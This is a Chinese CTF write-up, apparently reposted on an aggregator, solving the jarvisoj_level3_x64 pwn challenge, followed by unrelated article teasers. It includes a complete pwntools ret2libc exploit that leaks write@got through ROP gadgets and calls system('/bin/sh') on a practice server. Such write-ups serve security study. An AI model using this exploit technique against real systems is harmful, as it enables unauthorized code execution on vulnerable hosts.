jarvisoj_level3_x64

news2025/1/16 2:05:18

jarvisoj_level3_x64

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

64位,只开了nx

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  write(1, "Input:\n", 7uLL);
  return read(0, buf, 0x200uLL);
}

栈溢出

思路

溢出打libc,将平常的puts@got泄露改成write@got,puts只需要一个参数所以平时都是直接rdi,puts@got

write需要三个参数,本题是64位也就是rdirsirdx三个参数

三个参数都可以ROPgadget出来,因为没有rdx的gadget,但是实际上rdx的数也大于8,所以不需要也可

from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')
r,elf=rec("node4.buuoj.cn",29247,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
#debug('b *0x400613')

rdi=0x00000000004006b3
rsi_r15=0x00000000004006b1
pl=cyclic(0x88)
pl+=p64(rdi)+p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(0x40061A)
sla('Input:',pl)
leak=get_addr_u64()-libc.sym['write']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0x88)+p64(rdi)+p64(sh)+p64(sys)
sla('Input',pl)

#debug()
ia()

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1031739.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

铁路设备屡遭破坏!RFID电子锁实现铁路防护网破坏实时报警管理

铁路设备屡遭破坏!RFID电子锁实现铁路防护网破坏实时报警管理

铁路防护网是铁路运输中保障安全的重要组成部分,然而,铁路设备被破坏的情况时有发生,给铁路运输带来了严重的安全隐患和经济损失。 一、铁路防护网面临的挑战 铁路防护网作为铁路运输的重要保障措施,时刻面临着破坏行为的威胁。…
阅读更多...
win10 关闭edge跳转IE浏览器

win10 关闭edge跳转IE浏览器

按下windows键,搜索控制面板 右上角输入IE 点击IE 高级中取消下红框选择即可
阅读更多...
mapbox鼠标滑过高亮要素

mapbox鼠标滑过高亮要素

成果图 实现方法 这里借鉴了官网这个例子 https://docs.mapbox.com/mapbox-gl-js/example/hover-styles/ 这里是图层的样式配置,通过改变select的true和false,来控制渲染的颜色和宽度 paint: {line-opacity: 1,line-color: [case,[boolean, [feature-st…
阅读更多...
算法通过村第七关-树(递归/二叉树遍历)黄金笔记|迭代遍历

算法通过村第七关-树(递归/二叉树遍历)黄金笔记|迭代遍历

文章目录 前言1. 迭代法实现前序遍历2. 迭代法实现中序遍历3. 迭代法实现后序遍历总结 前言 提示:在一个信息爆炸却多半无用的世界,清晰的见解就成了一种力量。 --尤瓦尔赫拉利《今日简史》 你是不是觉得上一关特别简单,代码少,背…
阅读更多...
MySQL 高级语句 Part1(进阶查询语句+MySQL数据库函数+连接查询)

MySQL 高级语句 Part1(进阶查询语句+MySQL数据库函数+连接查询)

高级语句 第一部分 一、MySQL进阶查询语句1.1 select ----显示表格中一个或数个字段的所有数据记录1.2 distinct ----不显示重复的数据记录1.3 where ----有条件查询1.4 and or ----且 或1.5 in----显示已知的值的数据记录1.6 between----显示两个值范围内的数据记录1.7 通配符…
阅读更多...
如何选择最适转录本序列构建过表达质粒

如何选择最适转录本序列构建过表达质粒

以构建绵羊 PPARG 基因过表达质粒为例 主要利用的数据库有 NCBI 和 Uniprot 数据库,首先在 NCBI 检索绵羊 PPARG 基因信息,可以发现绵羊 PPARG 有8个转录本,而人就更多了,有16个转录本。这时就需要明确一个概念,构建过…
阅读更多...
CFCA证书 申请 流程(二)

CFCA证书 申请 流程(二)

关于CFCA证书的介绍,可参考上一篇文章:CFCA证书 申请 流程(一)_身价五毛的博客-CSDN博客 CFCA测试证书 申请流程 测试证书主要用于在测试环境对所需功能进行验证,例如HTTPS访问等。 首先,向CFCA的支持邮…
阅读更多...
【论文笔记】NeRF-RPN: A general framework for object detection in NeRFs

【论文笔记】NeRF-RPN: A general framework for object detection in NeRFs

原文链接:https://arxiv.org/abs/2211.11646 1. 引言 NeRF模型能直接从给定的RGB图像和相机姿态学习3D场景的NeRF表达。本文提出NeRF-RPN,使用从NeRF模型提取的辐射场和密度,直接生成边界框提案。 3. 方法 如图所示,本文的方法有…
阅读更多...
TouchGFX之画布控件

TouchGFX之画布控件

TouchGFX的画布控件,在使用相对较小的存储空间的同时保持高性能,可提供平滑、抗锯齿效果良好的几何图形绘制。 TouchGFX 设计器中可用的画布控件: LineCircleShapeLine Progress圆形进度条 存储空间分配和使用​ 为了生成反锯齿效果良好的…
阅读更多...
「UG/NX」BlockUI 选择小平面区域 Select Facet Region

「UG/NX」BlockUI 选择小平面区域 Select Facet Region

✨博客主页何曾参静谧的博客📌文章专栏「UG/NX」BlockUI集合📚全部专栏「UG/NX」NX二次开发「UG/NX」BlockUI集合「VS」Visual Studio「QT」QT5程序设计「C/C」C/C程序设计「Win」Windows程序设计「DSA」数据结构与算法「File」数据文件格式 目录 控件说…
阅读更多...
深入探究序列化与反序列化:原理、应用和最佳实践

深入探究序列化与反序列化:原理、应用和最佳实践

目录 什么是对象的序列化和反序列化序列化步骤反序列化步骤案例演示Java中哪些字段不能序列化序列化与反序列化的重要性序列化与反序列化的应用场景 什么是对象的序列化和反序列化 序列化(Serialization)是指将对象转化为字节流的过程,以便于…
阅读更多...
点燃创意,发掘绘图潜能——FireAlpaca for Mac专业绘图软件

点燃创意,发掘绘图潜能——FireAlpaca for Mac专业绘图软件

无论您是一位艺术家、插画师还是爱好绘图的人,寻找一款功能强大且易于使用的绘图软件都是必不可少的。而FireAlpaca for Mac作为一款专为Mac用户设计的专业绘图软件,将点燃您的创意,帮助您发掘绘图的潜能。 FireAlpaca for Mac拥有丰富的工具…
阅读更多...
Linux,计算机网络,数据库

Linux,计算机网络,数据库

Linux,计算机网络,数据库,操作系统 一、Linux1、linux查看进程2、linux基本命令3、top命令、查看磁盘 二、计算机网络1、HTTP的报文段请求 Repuest响应 Response 2、HTTP用的什么连接3、TCP的三次握手与四次挥手三次握手四次挥手 4、在浏览器…
阅读更多...
【RabbitMQ实战】02 生产者和消费者示例

【RabbitMQ实战】02 生产者和消费者示例

在上一节中,我们使用docker部署了RabbitMQ,这一节我们将写一段生产者和消费者的代码。将用到rabbitmq的原生API来进行生产和发送消息。 一、准备工作 开始前,我们先在RabbitMQ控制台建相好关的数据 本机的RabbitMQ部署机器是192.168.56.201…
阅读更多...
竞赛 基于深度学习的动物识别 - 卷积神经网络 机器视觉 图像识别

竞赛 基于深度学习的动物识别 - 卷积神经网络 机器视觉 图像识别

文章目录 0 前言1 背景2 算法原理2.1 动物识别方法概况2.2 常用的网络模型2.2.1 B-CNN2.2.2 SSD 3 SSD动物目标检测流程4 实现效果5 部分相关代码5.1 数据预处理5.2 构建卷积神经网络5.3 tensorflow计算图可视化5.4 网络模型训练5.5 对猫狗图像进行2分类 6 最后 0 前言 &#…
阅读更多...
【操作系统笔记五】内存布局内存映射

【操作系统笔记五】内存布局内存映射

虚拟内存布局 虚拟地址空间大小: 32位虚拟地址空间 [0 ~ 2^32 - 1] 总共4GB64位虚拟地址空间 [0 ~ 2^64 - 1] 总共16 777 216TB 不管是运行在用户态还是内核态,都需要使用虚拟地址,这是因为计算机硬件要求的,CPU要经过地址转换得…
阅读更多...
观测云产品更新 | 优化日志数据转发、索引绑定、基础设施自定义等

观测云产品更新 | 优化日志数据转发、索引绑定、基础设施自定义等

观测云更新 日志 数据转发:新增外部存储转发规则数据查询;支持启用/禁用转发规则;绑定索引:日志易新增标签绑定,从而实现更细颗粒度的数据范围查询授权能力。 基础设施 > 自定义 【默认属性】这一概念更改为【必…
阅读更多...
绝佳盘点:2023年最好用的AI机器人

绝佳盘点:2023年最好用的AI机器人

近几年人工智能可以说是以前所未有的速度在发展,越来越多的企业意识到,在运营的过程中学会熟练地应用AI机器人是可以帮助他们很好地提高工作效率的。那么有哪些AI机器人比较好用呢?接下来我会介绍几个个人觉得比较优秀的AI机器人工具&#xf…
阅读更多...
【51单片机】6-点亮第一个LED灯

【51单片机】6-点亮第一个LED灯

1.单片机编程的一般步骤 1.目标分析 点亮开发板上的LED灯 2.原理图【电路图】分析 1.目标器件(LED)工作原理 2.相关模块电路连接 3.控制线路分析:相关IO端口是哪些? 3.代码编写,编译 4.下载于调试 2.原理图与控制…
阅读更多...
杂记 | 使用gitlab-runner将python项目以docker镜像方式流水线部署到服务器(解决部署缓慢和时区不对的问题)

杂记 | 使用gitlab-runner将python项目以docker镜像方式流水线部署到服务器(解决部署缓慢和时区不对的问题)

文章目录 01 需求背景1.1 需求1.2 步骤 02 编写BaseDockerfile2.1 编写2.2 说明2.3 执行 03 编写Dockerfile04 编写.gitlab-ci.yml05 项目结构 01 需求背景 1.1 需求 我有一个python项目,该项目可能是一个服务器监控程序,也可能是一个后端程序&#xf…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023